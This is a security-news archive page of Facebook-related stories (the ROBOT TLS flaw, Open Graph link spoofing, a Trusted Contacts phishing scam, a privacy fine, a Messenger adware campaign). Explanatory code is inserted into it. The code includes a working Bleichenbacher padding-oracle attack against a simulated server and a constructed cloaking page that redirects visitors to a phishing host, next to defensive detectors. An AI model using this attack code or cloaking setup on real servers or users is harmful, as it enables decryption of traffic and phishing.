Tag Archives: Facebook

19-Year-Old TLS Vulnerability Weakens Modern Website Crypto

New research shows how an old vulnerability, now dubbed ROBOT (Return Of Bleichenbacher's Oracle Threat), can still be exploited with an adaptive chosen-ciphertext attack: a TLS server that leaks whether an RSA-encrypted message was correctly PKCS#1 v1.5 padded gives an attacker an oracle with which to decrypt the premaster secret of a recorded session, and with it the session's traffic, or to forge signatures with the server's private key.
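The oracle attack the teaser refers to, as an added example rather than code from the ROBOT researchers: a "server" that leaks one bit per query (whether the decryption began with the PKCS#1 v1.5 bytes 00 02), and an attacker that recovers the full plaintext from that bit alone using Bleichenbacher's 1998 algorithm. The key is a constructed 125-bit toy key (p = 2^61 - 1 and q = 2^64 - 59, both prime) so that it finishes in seconds; the algorithm is unchanged for a 2048-bit key, only the query count grows. In a real ROBOT attack the oracle is the server's differing alert, connection behaviour or timing, and the ciphertext is the encrypted premaster secret captured from a recorded handshake.

```python
"""Bleichenbacher's adaptive chosen-ciphertext attack, as revived by ROBOT.

Added example, not code from the ROBOT research. The key below is a
constructed toy key; the oracle is a simulated server that leaks whether
an RSA decryption started with the bytes 00 02.
"""
import secrets

P = (1 << 61) - 1                     # Mersenne prime M61 (constructed toy key)
Q = (1 << 64) - 59                    # largest prime below 2^64
N = P * Q
E = 65537
D = pow(E, -1, (P - 1) * (Q - 1))     # needs Python 3.8+
K = (N.bit_length() + 7) // 8         # modulus length in bytes (16 here)
B = 1 << (8 * (K - 2))                # [2B, 3B) is exactly the set of "00 02 ..." values


def pkcs1_v15_pad(msg: bytes) -> int:
    """EM = 00 || 02 || PS (at least 8 non-zero bytes) || 00 || M, as an integer."""
    assert len(msg) <= K - 11, "message too long for this modulus"
    ps = bytes(secrets.choice(range(1, 256)) for _ in range(K - 3 - len(msg)))
    return int.from_bytes(b"\x00\x02" + ps + b"\x00" + msg, "big")


def pkcs1_v15_unpad(m: int) -> bytes:
    em = m.to_bytes(K, "big")
    return em[em.index(b"\x00", 2) + 1:]


def encrypt(m: int) -> int:
    return pow(m, E, N)


class VulnerableServer:
    """Models a TLS server whose RSA key exchange leaks padding validity
    (the weakest Bleichenbacher oracle: only the leading 00 02 is checked)."""

    def __init__(self) -> None:
        self.queries = 0

    def padding_ok(self, c: int) -> bool:
        self.queries += 1
        em = pow(c, D, N).to_bytes(K, "big")
        return em[0] == 0x00 and em[1] == 0x02


def _ceil_div(a: int, b: int) -> int:
    return -(-a // b)


def bleichenbacher(oracle, c: int) -> int:
    """Recover m = c^d mod N from oracle answers only (Bleichenbacher, CRYPTO 1998).
    Each query submits c * s^e mod N, whose decryption is m * s mod N; a 'yes'
    answer pins m * s mod N into [2B, 3B) and narrows the candidate interval(s)."""

    def conforming(s: int) -> bool:
        return oracle(c * pow(s, E, N) % N)

    M = [(2 * B, 3 * B - 1)]                 # m itself is conforming, so it starts here
    s = _ceil_div(N, 3 * B)                  # step 2a: smallest s worth trying
    while not conforming(s):
        s += 1
    while True:
        new = []                             # step 3: intersect intervals with those implied by s
        for a, b in M:
            r_lo = _ceil_div(a * s - 3 * B + 1, N)
            r_hi = (b * s - 2 * B) // N
            for r in range(r_lo, r_hi + 1):
                lo = max(a, _ceil_div(2 * B + r * N, s))
                hi = min(b, (3 * B - 1 + r * N) // s)
                if lo <= hi:
                    new.append((lo, hi))
        new.sort()
        M = []
        for lo, hi in new:                   # merge overlapping or adjacent intervals
            if M and lo <= M[-1][1] + 1:
                M[-1] = (M[-1][0], max(M[-1][1], hi))
            else:
                M.append((lo, hi))
        if len(M) == 1 and M[0][0] == M[0][1]:
            return M[0][0]                   # step 4: a single candidate remains
        if len(M) > 1:                       # step 2b: several intervals, keep scanning s upward
            s += 1
            while not conforming(s):
                s += 1
        else:                                # step 2c: one interval, jump s using r
            a, b = M[0]
            r = _ceil_div(2 * (b * s - 2 * B), N)
            while True:
                s_lo = _ceil_div(2 * B + r * N, b)
                s_hi = (3 * B + r * N) // a
                s = next((t for t in range(s_lo, s_hi + 1) if conforming(t)), None)
                if s is not None:
                    break
                r += 1


def demo(secret: bytes = b"ROBOT"):
    """Encrypt a constructed secret, then recover it using only the oracle."""
    m = pkcs1_v15_pad(secret)
    server = VulnerableServer()
    recovered = bleichenbacher(server.padding_ok, encrypt(m))
    return recovered == m, pkcs1_v15_unpad(recovered), server.queries


if __name__ == "__main__":
    ok, plaintext, queries = demo()
    print(f"recovered={plaintext!r} correct={ok} oracle_queries={queries}")
```

The query counter is the number a practitioner cares about: with this toy key a few thousand oracle answers suffice, and for a 2048-bit key the published estimates are in the tens of thousands to low millions, which is why a server that answers even slightly differently to malformed padding is exploitable against recorded traffic.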


Wait, Do You Really Think That’s A YouTube URL? Spoofing Links On Facebook


While scrolling through Facebook, how do you decide which link or article to open?

The Facebook timeline and Messenger display the title, description, thumbnail image and URL of every shared link, and that information is usually enough to decide whether the content interests you.

Since Facebook is full of spam, clickbait and fake news articles these days, most users do not click every link served to them.

But the likelihood of opening an article is much higher when content of interest appears to come from a legitimate, authoritative website such as YouTube or Instagram.

However, what if a link that appears to come from a legitimate website lands you in trouble?

Ordinary users were already unable to edit the preview of a link shared on Facebook, and in July 2017, to curb the spread of misinformation, the social media giant also removed the ability for Pages to edit the title, description and thumbnail image of a shared link.

However, it turns out that spammers can spoof the URL shown for a shared link to trick users into visiting pages they do not expect, redirecting them to phishing or fake-news sites, or to pages serving malware.

Discovered by 24-year-old security researcher Barak Tawily, the trick lets anyone spoof the displayed URL by abusing the way Facebook fetches link previews.

In brief, Facebook scans the shared page for Open Graph meta tags to determine its properties, specifically 'og:url', 'og:image' and 'og:title', from which it takes the URL, thumbnail image and title respectively.


Tawily found that Facebook does not validate that the link in the 'og:url' meta tag matches the URL the page was actually fetched from, so spammers can spread malicious pages on Facebook under spoofed URLs simply by placing a legitimate URL in the 'og:url' tag on their own sites.

“In my opinion, all Facebook users think that preview data shown by Facebook is reliable, and will click the links they are interested in, which makes them easily targeted by attackers that abuse this feature in order to perform several types of attacks, including phishing campaigns/ads/click fraud pay-per-click,” Tawily told The Hacker News.

Tawily reported the issue to Facebook, but the company declined to treat it as a security flaw, pointing out that it uses "Linkshim" to protect against such attacks.

Every time a link is clicked on Facebook, a system called "Linkshim" checks the URL against the company's own blacklist of known malicious links in order to block phishing and malware sites.

This means that if an attacker uses a fresh domain to host the spoofed links, Linkshim has no blacklist entry to match against, and the check passes.

Linkshim also uses machine learning to classify never-before-seen pages by scanning their content, but Tawily found that this can be bypassed by cloaking: serving benign content to Facebook's crawler, identified by its User-Agent or IP address, while serving the malicious page to everyone else.
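The two weaknesses described above, the unchecked 'og:url' tag and the crawler cloaking, as an added example that is not Facebook's code: it parses the Open Graph tags from a constructed spoof page, shows the URL a naive preview builder would display next to one that only honours 'og:url' when it shares the fetched page's hostname, and detects cloaking by fetching the same URL as the crawler and as a browser. The server, pages and hostnames are constructed placeholders; "facebookexternalhit" is the real User-Agent prefix of Facebook's link crawler.

```python
"""Open Graph preview parsing, og:url validation and crawler cloaking.

Added example, not Facebook's code. Pages, hostnames and the server are
constructed so that the whole thing runs offline.
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit

CRAWLER_UA = "facebookexternalhit/1.1"                 # Facebook's crawler UA prefix (real)
BROWSER_UA = "Mozilla/5.0 (X11; Linux x86_64) Firefox/56.0"
ATTACKER_URL = "https://attacker.example/cat-video"     # constructed

# What the crawler is served: og:url claims a YouTube address, body is harmless.
CRAWLER_PAGE = """<html><head>
<meta property="og:title" content="Cute cat video">
<meta property="og:image" content="https://attacker.example/thumb.jpg">
<meta property="og:url" content="https://www.youtube.com/watch?v=constructed">
</head><body>Nothing to see here.</body></html>"""

# What a real visitor is served: same tags, but the page bounces to a phishing site.
VISITOR_PAGE = CRAWLER_PAGE.replace(
    "Nothing to see here.",
    '<script>location.href = "https://phish.example/login";</script>')


def cloaking_server(url: str, user_agent: str) -> str:
    """Constructed attacker server: benign content for Facebook's bot, else the real page."""
    if user_agent.startswith("facebookexternalhit"):
        return CRAWLER_PAGE
    return VISITOR_PAGE


class OpenGraphParser(HTMLParser):
    """Collects <meta property="og:..." content="..."> tags; the first tag for a key wins."""

    def __init__(self) -> None:
        super().__init__()
        self.og = {}

    def handle_starttag(self, tag, attrs):
        if tag != "meta":
            return
        a = dict(attrs)
        prop = a.get("property") or ""
        if prop.startswith("og:") and a.get("content") is not None:
            self.og.setdefault(prop[3:], a["content"])


def parse_open_graph(html: str) -> dict:
    parser = OpenGraphParser()
    parser.feed(html)
    return parser.og


def build_preview(fetched_url: str, html: str, trust_og_url: bool) -> dict:
    """trust_og_url=True reproduces the behaviour Tawily described; False is the
    hardened variant, where og:url may only rewrite the display URL within the
    same hostname as the page it was fetched from."""
    og = parse_open_graph(html)
    shown = fetched_url
    claimed = og.get("url")
    if claimed and (trust_og_url or
                    urlsplit(claimed).hostname == urlsplit(fetched_url).hostname):
        shown = claimed
    return {"title": og.get("title"), "image": og.get("image"), "url": shown}


def is_cloaking(url: str, fetch=cloaking_server) -> bool:
    """Fetch as the crawler and as a browser; a differing response means the site
    shows the classifier something the user never gets."""
    return fetch(url, CRAWLER_UA) != fetch(url, BROWSER_UA)


if __name__ == "__main__":
    html = cloaking_server(ATTACKER_URL, CRAWLER_UA)
    print("naive preview:   ", build_preview(ATTACKER_URL, html, trust_og_url=True))
    print("hardened preview:", build_preview(ATTACKER_URL, html, trust_og_url=False))
    print("cloaking:", is_cloaking(ATTACKER_URL))
```

Comparing hostnames is the minimal check; a production preview service would compare registrable domains using the public suffix list, and the cloaking comparison should ignore nonces and timestamps in the HTML before deciding that the two responses differ.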

Tawily has also published a demo video showing the attack in action.

Since there is no way to see the actual URL behind a shared link on Facebook without clicking it, there is little a user can do to protect themselves beyond being vigilant.

Scam Alert: Your Trusted Friends Can Hack Your Facebook Account


If you receive a message from one of your Facebook friends asking for urgent help to recover their Facebook account because they have added you as one of their 'Trusted Contacts', don't take it at face value.

Researchers have detected a new Facebook phishing scam that can trick even an experienced technical user, handing an attacker access to the victim's own Facebook account.

The scam abuses "Trusted Contacts", a Facebook account-recovery feature that sends secret access codes to a few of your close friends so that they can help you regain access to your account if you forget your password or are otherwise locked out.

According to a public security alert published by Access Now, the attack starts from an already compromised account belonging to one of your friends, which messages you asking for urgent help getting back into "their" account.

The attacker, hiding behind your friend's identity, explains that you are listed as one of their Trusted Contacts and asks you to check your email for a recovery code and send it back.

In reality, the code you receive is not a key to your friend's account. The attacker has submitted a "Forgot my password" request for your account, and the code in your inbox is the one Facebook sent to reset your own password; handing it over hijacks your account.

Believing that a friend is in trouble, many people would share the code without a second thought.

“The new attack targets people using Facebook, and it relies on your lack of knowledge about the platform’s Trusted Contacts feature,” Access Now warns.

Facebook's Trusted Contacts feature does not work the way this phishing message suggests: a password-reset code that lands in your inbox is for your account, not someone else's. To understand how the feature actually works, see Facebook's own help post on it.

Access Now says: "So far we're seeing the majority of reports [of victims of this new Facebook phishing scam] from human right defenders and activists from the Middle East and North Africa."

Although this scam starts from a compromised account belonging to a friend, any of your Facebook friends could also run it deliberately, and given how readily people accept friend requests from strangers on the platform, "friend" is a low bar.


The best defence is to treat every recovery email you receive with suspicion and read it carefully, even when the request appears to come from a real friend: a password-reset code for your account is for you alone, and no friend ever needs it.

Stay Safe!

Powered by WPeMatico

Facebook slapped with $1.43 million fine for violating users’ privacy in Spain


Facebook is once again in trouble regarding its users’ privacy.

The social media giant has been heavily fined, once again, for a series of privacy violations in Spain.

Recently, Google also incurred a record-breaking €2.42 billion ($2.7 billion) fine from European antitrust officials for unfairly manipulating search results since at least 2008.

Now the Spanish Data Protection Agency (AEPD) has issued a €1.2 million (nearly $1.4 million) fine against Facebook for breaching laws designed to protect people's information and confidentiality.

According to the data protection watchdog, the social network collects its users' personal data without their "unequivocal consent" and profits by sharing that data with advertisers and marketers.

The AEPD also found that Facebook collects sensitive data on users' ideology, religious beliefs, sex, personal tastes and browsing, either directly through its own services or through third parties, without clearly informing users how the information will be used.

This activity constituted a “very serious” infringement of the country’s local data protection law (LOPD), for which the authority fined the company €600,000 ($718,062).

The regulator also identified two “serious” violations of privacy laws, including:

  1. Tracking people through the use of “Like” button social plug-ins embedded in other non-Facebook web pages—for which it is fined €300,000 ($359,049).
  2. Failing to delete data once it has finished using it; instead the company "retains and reuses it later associated with the same user", which drew another €300,000 ($359,049) fine.

The AEPD also said that Facebook’s existing privacy policy contains “generic and unclear terms,” and doesn’t “adequately collect the consent of either its users or nonusers, which constitutes a serious infringement.”

However, Facebook denied any wrongdoing and said it intends to appeal the Spanish regulator's decision, giving the following statement:

“We take note of the DPA’s decision with which we respectfully disagree. Whilst we value the opportunities we’ve had to engage with the DPA to reinforce how seriously we take the privacy of people who use Facebook, we intend to appeal this decision.” 

“As we made clear to the DPA, users choose which information they want to add to their profile and share with others, such as their religion. However, we do not use this information to target adverts to people.”

In May, the social media giant was also fined €150,000 ($179,532) by France's data protection authority, the CNIL, for the way it targeted advertising and tracked users.


Facebook Messenger: Beware of malware!


New cross-platform malware for Windows/Mac/Linux spreading via Facebook Messenger

A cybercriminal gang is using Facebook Messenger to spread a new malware campaign through links to spoofed websites. The threat, which is tailored to each web browser, was uncovered by a security researcher who received a suspicious message from one of his Facebook friends and decided to analyse it.

How malware works

The mechanics of the attack are relatively simple. The target receives a Facebook message containing their name, the word "Video" and a shocked emoji, followed by a shortened URL. Because the message comes from one of the victim's friends, they are very likely to click the link. The link opens a Google Docs page showing a blurred picture lifted from Facebook and styled to look like a playable video. If the victim tries to play it, they are sent to one of several websites, chosen according to their web browser, operating system, location and other factors, which then prompts them to install malicious software.

Google Chrome users, for example, are redirected to a fake YouTube page complete with the official logo and branding. The page shows a fake error message designed to trick them into installing a malicious Chrome extension. Firefox users are instead sent to a website displaying a fake Flash update notice which, once run, launches a Windows executable that installs adware. Safari users are taken to a similar site customised for macOS that encourages them to download a malicious .dmg file.

A highly complex, sophisticated attack

This type of malware tracks the victim's browsing activity with cookies and displays targeted adverts, using social engineering to get the user to click on them. It spreads across platforms via Facebook Messenger and rotates through multiple domains to evade tracking while still earning clicks.

The malicious code is complex, and researchers suggest that the links are being sent from real Messenger accounts compromised through stolen passwords, hijacked browsers or clickjacking. Each click on the ads generates revenue for the malware authors, and although relatively little is known about the campaign and those behind it, the sheer number of Facebook Messenger users gives the attackers an extremely large pool of potential victims.

How to protect yourself from malware

One simple way to avoid falling victim to this scam is to treat any link received from a Facebook friend with caution. For greater security, experts recommend having a trusted, up-to-date antivirus such as Panda Protection installed on your computer. In addition, a Facebook spokesperson has confirmed that the company maintains a number of automated systems to help stop the distribution of harmful links and files through the social network.

The post Facebook Messenger: Beware of malware! appeared first on Panda Security Mediacenter.


Facebook Telepathy Texting – Could It Be Hacked?

Is telepathy texting the next step in technology communications?

With over 2 billion registered members, Facebook is the world's most popular online service. To keep that title, Facebook is constantly developing new services to keep people logging in. In a recent video conference, Facebook chief Mark Zuckerberg discussed one of the cutting-edge projects his team is working on. The secretive Building 8 division has begun developing what it calls a "direct brain interface", technology that would let people text by "telepathy".

What would you do with a direct brain interface?

The direct brain interface is intended to capture the words you are about to speak as they pass through your brain. Those thoughts would then be converted into text ready for transmission, to a nearby screen or even directly into the mind of another person wearing a similar interface.

Initially, Facebook hopes the technology will allow people with brain injuries or communication problems to finally "speak" with the outside world. One scientist working on the project believes such a device would be "as transformative as the computer mouse".

Taking the direct brain interface mainstream

Once the medical application has been proven, Facebook would naturally expect to take the interface mainstream. Zuckerberg described how he would like to see the technology used to send messages telepathically between Facebook users.

Because the technology is "decades" from release, it is hard to picture what the interface could really do. At the most basic level it would probably work like a person-to-person version of the Facebook Messenger app: users would send text messages straight into the brains of their friends, anywhere in the world, without lifting a finger or making a sound.

The potential for problems

Like any computing device, a direct brain interface could be hacked. The specifics of such an attack are hard to guess, and some could be relatively harmless, such as unwanted advertising pushed straight into the brain.

The outcomes could conceivably be far worse. Malware that drives up processor activity could cause the interface to overheat and damage brain tissue, for instance. Stuxnet demonstrated that malware can cause physical damage; if that damage is done to a device wired directly to the human brain, the results could be catastrophic, potentially fatal.

Plenty of time to prepare

The good news is that Facebook's telepathic text system is still a long way from having anything to test. It will be many years before we see a working prototype, let alone a unit we can buy.

In the meantime, engineers will be hard at work developing security measures to protect users against hackers and malware, and as devices start to appear you can expect new anti-malware products to add an extra layer of defence.

Until then, why not check that Facebook Messenger is properly protected on your phone with a free Panda Mobile Security download.

The post Facebook Telepathy Texting – Could It Be Hacked? appeared first on Panda Security Mediacenter.


Beware of Windows/MacOS/Linux Virus Spreading Through Facebook Messenger


If you come across a Facebook message containing a video link, sent by anyone, even a friend, don't click it.

Security researchers at Kaspersky Lab have spotted an ongoing cross-platform campaign on Facebook Messenger in which users receive a video link that redirects them to a fake website luring them into installing malicious software.


Although it is still unclear exactly how the malware spreads, researchers believe the spammers are using compromised accounts, hijacked browsers or clickjacking techniques to send the malicious link.

The attackers use social engineering to get users to click the video link, which purports to come from one of their Facebook friends: the message reads "<your friend's name> Video" followed by a bit.ly link.

Here’s How this Cross-Platform Malware Works:


The URL redirects victims to a Google Docs page displaying a dynamically generated video thumbnail, built from the sender's images to look like a playable movie. Clicking it redirects the user again, this time to a landing page customised for their browser and operating system.

For example, Mozilla Firefox users on Windows are redirected to a website displaying a fake Flash Player update notice and are then offered a Windows executable that antivirus engines flag as adware.


Google Chrome users are redirected to a website masquerading as YouTube, complete with a similar logo, which displays a fake error popup to trick victims into installing a malicious Chrome extension from the Chrome Web Store.


The extension is actually a downloader that fetches a file of the attacker's choice onto the victim's computer.

“At the time of writing, the file which should have been downloaded was not available,” David Jacoby, a chief security researcher from Kaspersky Lab, writes in a blog post published today.

“One interesting finding is that the Chrome Extension has log files from the developers displaying usernames. It is unclear if this is related to the campaign, but it is still an amusing piece of information.”

Safari users on macOS end up on a page similar to the one served to Firefox users, but customised for macOS with a fake Flash Media Player update that, if clicked, downloads a .dmg installer, which is also adware.

Linux users are likewise redirected to a landing page built for Linux.

The attackers behind the campaign are not infecting any platform with a banking trojan or exploit kit; they deliver adware and make their money from the ad revenue it generates.
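The per-browser dispatch described in this article and in the Panda Security piece above, as an added example that is not Kaspersky's or Panda's code: an analyst who receives one of these short links wants every landing page the campaign serves, not just the one for their own browser, so the same link is resolved under several User-Agents and each redirect chain recorded. The HTTP layer here is a constructed in-memory model of the chain (bit.ly, then the Google Docs page, then a dispatcher that fingerprints the browser); in reality the Google Docs hop is a click on the fake thumbnail rather than an HTTP redirect, and the hostnames, paths and User-Agent strings are placeholders. Against a live chain the same loop would use requests.get(url, headers={"User-Agent": ua}, allow_redirects=False) from a sandboxed host.

```python
"""Enumerating the per-browser landing pages of the Messenger spam chain.

Added example, not the researchers' code. The fetch function is a
constructed model of the campaign's servers so that it runs offline.
"""
from urllib.parse import urlsplit

REDIRECTS = (301, 302, 303, 307, 308)

# Constructed User-Agent strings for the browser/OS combinations the article lists.
PROFILES = {
    "chrome-windows": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/61.0",
    "firefox-windows": "Mozilla/5.0 (Windows NT 10.0; rv:56.0) Gecko/20100101 Firefox/56.0",
    "safari-macos": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) Version/11.0 Safari/604.1",
    "firefox-linux": "Mozilla/5.0 (X11; Linux x86_64; rv:56.0) Gecko/20100101 Firefox/56.0",
}


def classify(user_agent: str):
    """Crude browser/OS fingerprint of the kind the campaign's dispatcher relies on."""
    if "Chrome" in user_agent:
        browser = "chrome"
    elif "Firefox" in user_agent:
        browser = "firefox"
    elif "Safari" in user_agent:
        browser = "safari"
    else:
        browser = "other"
    if "Windows" in user_agent:
        os_name = "windows"
    elif "Mac OS X" in user_agent:
        os_name = "macos"
    elif "Linux" in user_agent:
        os_name = "linux"
    else:
        os_name = "other"
    return browser, os_name


def fake_fetch(url: str, user_agent: str):
    """Constructed model of the chain. Returns (status, Location header or None, body)."""
    host = urlsplit(url).hostname
    if host == "bit.ly":
        return 301, "https://docs.google.com/document/d/constructed-id/edit", ""
    if host == "docs.google.com":
        # the click on the fake thumbnail is modelled as a redirect to the dispatcher
        return 302, "https://dispatch.example/go", ""
    if host == "dispatch.example":
        browser, os_name = classify(user_agent)
        lure = {
            ("chrome", "windows"): "https://yt-lookalike.example/error?ext=chrome",
            ("firefox", "windows"): "https://flash-update.example/setup.exe",
            ("safari", "macos"): "https://flash-update.example/FlashPlayer.dmg",
        }.get((browser, os_name), f"https://landing.example/{os_name}")
        return 302, lure, ""
    return 200, None, f"<html>lure served to {user_agent[:24]}</html>"


def resolve_chain(url: str, user_agent: str, fetch=fake_fetch, max_hops: int = 10):
    """Follow redirects hop by hop without auto-following, so every hop is recorded."""
    chain = [url]
    for _ in range(max_hops):
        status, location, _body = fetch(chain[-1], user_agent)
        if status not in REDIRECTS or not location:
            return chain
        chain.append(location)
    chain.append("<max hops exceeded>")     # loop or very long chain: report, don't spin
    return chain


def landing_pages(short_url: str, profiles=PROFILES, fetch=fake_fetch) -> dict:
    """Map each browser profile to the final URL it lands on."""
    return {name: resolve_chain(short_url, ua, fetch)[-1] for name, ua in profiles.items()}


if __name__ == "__main__":
    for name, final in landing_pages("https://bit.ly/constructed").items():
        print(f"{name:16s} -> {final}")
```

Recording the whole chain rather than only the final URL matters for takedown and blocking: the short link, the Google Docs document and the dispatcher host are each a separate abuse report.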

Spam campaigns on Facebook are common. A few years ago, researchers found cybercriminals using booby-trapped .JPG image files to deliver variants of the Locky ransomware, which encrypts the files on an infected PC until a ransom is paid.

To stay safe, resist the curiosity to open images or video links sent by anyone, even a friend, without first verifying with them that they actually sent the message, and keep your antivirus software up to date.
